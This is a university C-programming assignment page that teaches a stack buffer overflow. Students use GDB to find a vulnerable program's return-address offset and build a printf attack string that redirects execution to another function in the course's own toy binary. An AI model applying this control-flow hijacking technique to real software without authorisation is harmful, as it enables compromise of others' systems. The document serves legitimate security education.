Advanced C Programming

Spring 2023 ECE 264 :: Purdue University

Alchemy details (also sent last week)
Due 4/29

Buffer overflow

Goals

The goals of this assignment are as follows:
  1. Understand how your compiled C code operates at the instruction level.
  2. Appreciate the value of memory safety to security concerns.
  3. Get a brief introduction to application security at the binary level.

Overview

There are many ways to attack a vulnerable application, to behave in a way that the author did not intend—and that the attacker did intend. One very common way is the buffer overflow attack. This is possible if a target program does takes inputs from a user and loads them into a buffer (string) without checking if it is big enough to hold the input.

In this assignment, you are given a vulnerable program, including the source code. Your job is to create a malicious input string that will cause it to call another function.

Your buffer overflow attack will consist of sending an attack string to the program that is longer than the length of the name string buffer, and spills junk data all the way to the return address. (See the readings.) You will overwrite the return address with a different address in the code (in the text segment), so that when greet_visitor(…) tries to return, instead of jumping back to main(…), it instead jumps to scare_visitor(…). Thus, you need to find the number of bytes from beginning of name to the beginning of the return address. That is the number of filler characters you will have. Then, you will add a few more bytes: the address of the scare_visitor(…) function in memory.

You will not write any C code for HW22. Instead, you will create a very small text file containing an attack string. When the attack string is piped to the target program, it will cause it to do something it wasn't intended to do.

Most of your effort will be to analyze the stack of the target program (and get familiar enough to do so).

Doing the assignment

This assignment is different from the others in ECE 264. Most of what you need to do is just understanding ⓐ the stack, and ⓑ how function calls work. You will do that through two required readings, and a little tinkering in GDB. Once you have done that, creating the attack string.

Learn

  1. Learn how to examine the disassembly of your program in GDB. Read the first half of Understanding C by learning assembly. You can stop reading when you see the heading “understanding static local variables”.
    This blog post is one of the clearest introductions i've found; it doesn't go into too much detail. Also, it ties in nicely with C programming and GDB.
    ≈3 pages (not counting the parts you skip)
  2. Learn how function calls work, and how to read assembly instructions. Read Introduction to x64 assembly language, except the left half of page 2 (about directives). Page 3 (instructions) will help you make sense of the assembly instructions you are seeing, but you won't need to understand deeply.
    – 3½ pages (not counting the left half of page 2)
  3. Understand how greet_visitor(…) is called in our target program (boa.c). This (PDF walk-through) takes you through each step of the function call. The memory addresses are different from what you will get when you compile and run boa.c, but once you understand this, you will be ready to find the information in the real executable.
  4. Check your understanding. When you are done with the readings, you should be able to answer the following:
    1. What is the disassembly of a program?
    2. What is a register?
    3. What do the base pointer (%rbp) and stack pointer (%rsp) tell us?
    4. What does the instruction pointer (%rip) tell us?
    5. Is %rbp < %rsp or is %rsp < %rbp?
    6. Are local variables at a higher or lower memory address from %rbp?
    7. What happens in the preamble? … and the epilogue?
    8. What does the retq instruction do?
    9. What does the notation -0x8(%rbp) mean?
    10. Where is the return address stored, relative to the base pointer (%rbp)?
  5. You are now ≈80% done with HW22, the last homework for ECE 264. (Until you have done the above, the steps below are likely to be confusing.)

Get acquainted with the target program.

  1. Get the starter files.
    $ 264get hw22
  2. Compile boa.c to create the exectuable boa. Note that you have to suppress warnings for unused variables and for using gets as the course gcc alias treats warnings as errors.
    $ gcc -o boa boa.c -Wno-unused-variable -Wno-implicit-function-declaration
  3. Run the target program normally (boa.c). This is to make sure you understand the normal behavior of hit program, so you don't miss the big picture of this assignment.
    $ ./boa
    Hello. What is your name? Tom Hello, Tom.

Learn how to pipe input from a file to a program.

  1. Create an input file containing your name and pipe it to boa. Just open your editor, type your name, save, and exit.
    $ vim input.txt
    This command runs boa and uses the contents of input.txt as the input, i.e., in lieu of whatever the user might have typed at the terminal.
    $ ./boa < input.txt
    Hello. What is your name? Hello, Tom.
  2. Create an input file from the command line boa. The printf command in bash lets you print formatted messages to the terminal using syntax that is vaguely similar to printf(…) in C. Examples:
    $ printf "Tom\n"
    Tom
    You can also specify characters using their hexadecimal codes. That will be helpful later in this process when you need to print a memory address, which may include bytes that do not correspond to easily typable ASCII characters. For example, the address 0x400123 can be printed with printf "\x23\x01\x40\x00\x00\x00\x00\x00", using little-endian byte order. For example, "\x41" is the same as "A". Both will emit 1 byte when printed. Likewise, "\x41B\x43" is the same as "A\x42C" is the same as "ABC". All emit 3 bytes when printed.
    Let's use this same method to print the name “Tom” again.
    $ printf "\x54\x6f\x6d\n"
    Tom

Examine the executable (boa)

  1. Start boa in gdb. Set a breakpoint inside greet_visitor(…), just before it returns. In other words, set the breakpoint for the line containing the closing curly brace (}).
  2. Try some GDB commands. At this point, the program boa should be running, and GDB should be paused at the point just before greet_visitor(…) returns. Try a few commands. (We are not showing the output here. You need to try it yourself.)
    (gdb) info registers
    … shows the values in all register. The only ones we care about are $rbp (base pointer), $rsp (stack pointer), and $rip (instruction pointer).
    (gdb) disassemble /s greet_visitor
    … shows the assembly instructions for greet_visitor(…). The /s flag tells GDB to intersperse the C code lines with the disassembly.
    (gdb) disassemble /s scare_visitor
    … shows the assembly instructions for scare_visitor(…).
    (gdb) disassemble /s main
    … shows the assembly instructions for main(…).
    (gdb) print $rbp
    … prints the value of the base pointer.
  3. Print a hex dump of the current stack frame using the x/ command. We will use a command like x/▒▒bx ▒▒.
    From the readings, you will know that the stack frame begins at $rsp so the command will be x/▒▒bx $rsp.
    But how many bytes do we need to look at? For that, we need to know $rbp - $rsp + 8.
    GDB makes this surprisingly easy.
    (gdb) print $rbp - $rsp + 8
    That should print a number. That's how many bytes we want to look at.
  4. Find the location of the variable name relative to the base pointer. In other words, you need to find the base pointer offset (▒▒▒(%rbp)) of the name variable.
    This may require some fiddling. We are not providing the exact commands. We want you to get a little experience digging around, and thinking about how the stack is arranged.
  5. Find the location of the return address, relative to the base pointer. If you followed the readings carefully, this part will be trivial. Otherwise, just look at the disassembly. You can get it from the assembly instructions and/or from inspecting the hex dump of the stack.
  6. Calculate the distance from name to the return address. Remember: You will be deliberately overflowing the name buffer (string) so that you can overwrite the old return address with your own evil address.
  7. Find the value you will need to write into the return address. The goal is for it to call scare_visitor(…) and print BRAH!!!. Thus, you need to find the address of the instruction to jump to (instead of going back to main(…)).
  8. Write out your attack string on paper. It will consist of a real name (e.g., Tom), followed by some filler bytes, and finally the new (evil) instruction address that you want to overwrite the return address with.

Create your attack

  1. Create your attack input file: input.txt.
    $ printf "name\x00filler bytes\x▒▒\x▒▒\x▒▒\x▒▒\x▒▒\x▒▒\x▒▒\x▒▒" > input.txt
    Remember that in memory, addresses are stored in little endian byte order, just like the numbers in the BMP file format in images and mtat. For example, the address 0x400123 would be shown as 0x23 0x01 0x40 0x00 0x00 0x00 0x00 0x00 in the memory dump (via the gdb x command). When you craft your attack string, it will need to be little endian, as well.
  2. Test your attack.
    $ ./boa < input.txt
    Hello. What is your name? Hello, Tom.█████████████▓▓▒▒░░BRAH!!! Segmentation fault (core dumped)
    It's okay if you get a segmentation fault. In fact, you will definitely get a segmentation fault. That is one of many rules we are breaking for HW22. As long as it prints “BRAH!!!”, you are done and ready to submit.

How much work is this?

Expect to spend around ≈2 hours reading, ≈1 hours fussing with GDB, and ≈1 hour crafting your attack string. Obviously, your experience may vary.

Prester

There will be no pretester for HW22. We will test your attack using the command shown in step 20 (above).

Requirements

  1. Your submission must contain each of the following files, as specified:
    file contents
    input.txt attack string Supplying this string to the executable, boa, should cause it to redirect execution to scare_visitor(…), which will print BRAH!!!.
    boa.c target code Target code, submitted as is with no changes
    1. We will most likely not look at this. It is only a failsafe.
    boa target executable Compiled target code
    • This is just the executable that you compiled using gcc.
    • You don't need to do anything except compile what you were given.
    • We will most likely not use this. It is only a failsafe, in case we can't reproduce your attack with ours.

Submit

To submit HW22 from within your hw22 directory, type 264submit HW22 input.txt boa.c boa

We do not plan to use the boa.c and boa you submit. We ask you to submit them only as a failsafe, in case somehow your executable ends up different from ours.

Q&A

  1. Will the addresses of functions always stay the same?
    They are tied to a specific executable file. As long as you don't recompile, they will be the same.
  2. How can you be so sure the addresses won't change?
    The executable file specifies where in memory it should be loaded.
  3. Is there any other way to see the mapping between code and instructions, besides GDB?
    objdump -S --disassemble boa
    This prints everything in the executable, including other supporting code. Our code accounts for only 188 of the 8689 bytes in the boa executable.
    It is also possible to get the disassembly from gcc using gcc boa.c -o boa.s but this is less useful than objdump or gdb because it does not interleave the C code lines with the assembly.
  4. What if I recompile?
    If you recompile on the same machine with the same compiler, same options, and same boa.c, addresses will not change.
  5. How is the printf bash command related to the printf(…) C function?
    Name only… and a few format conventions (e.g., %d, %s, etc.) that were mimicked by the creators of the printf bash command. For C programmers, it can be handy to be able to format strings using percent codes (e.g., %d) and hexadecimal escape characters (e.g., \x07) from bash.
  6. I am getting the segmentation fault but no "BRAH!!!" message. What's wrong?
    You are on the right track. Most likely, the new return address isn't getting to the right location on the stack.
    Make sure you have the right address for scare_visitor(…), the right offset (distance from name[0] to return address), and corresponding number of filler characters. Also, keep in mind that gets(…) will write a null terminator ('\0') after your input string. Since the return address, when written in little endian, ends with a bunch of zeros, you may want to leave off the last zero in the return address. That way, the null terminator (==0) will simply be overwriting another zero.
  7. What's the best way to see the contents of my input.txt?
    xxd input.txt
  8. Can I edit input.txt in Vim?
    Yes, but you must open Vim with in binary mode using the -b flag like this:
    vim -b input.txt
    Without that, Vim—like most editors in the world—automatically add a newline (\n) at the end of the file, if there isn't already one there. The -b flag tells Vim not to do that.
    To type non-printable ASCII characters (≤31 or ≥127), press Ctrl-V then x then the two digit hex value (e.g., 06).
    Another way to edit a binary file in Vim is to convert it to the hex dump—and then back. First open the file in binary mode (vim -n input.txt). Next, enter :%!xxd to convert the current buffer to a hex dump. Make any edits you like, but be sure to keep the hex dump format. Finally, enter :%!xxd -r to convert back from the hex dump to the binary file.
  9. Do I need to add any flags special flags to gcc when compiling boa.c?
    No. Initially, Prof. Quinn said in lecture that you should add -O0 since it is widely written online that turning off compiler optimizations using that flag is needed to keep the executable stable. Upon some experimentation, that does not seem to be the case. Likewise, it is often reported that for simple buffer overflow attacks like this to work, you must explicitly tell gcc to turn off certain protections. That does not seem to be necessary for our simple case. It works just fine with the default compiler flags that we use in this class (-g -std=c11 -Wall -Wshadow -Wvla -Werror -pedantic).

Updates

12/8/2022 Link for Introduction to x64 Assembly - Martin Hirzel was fixed.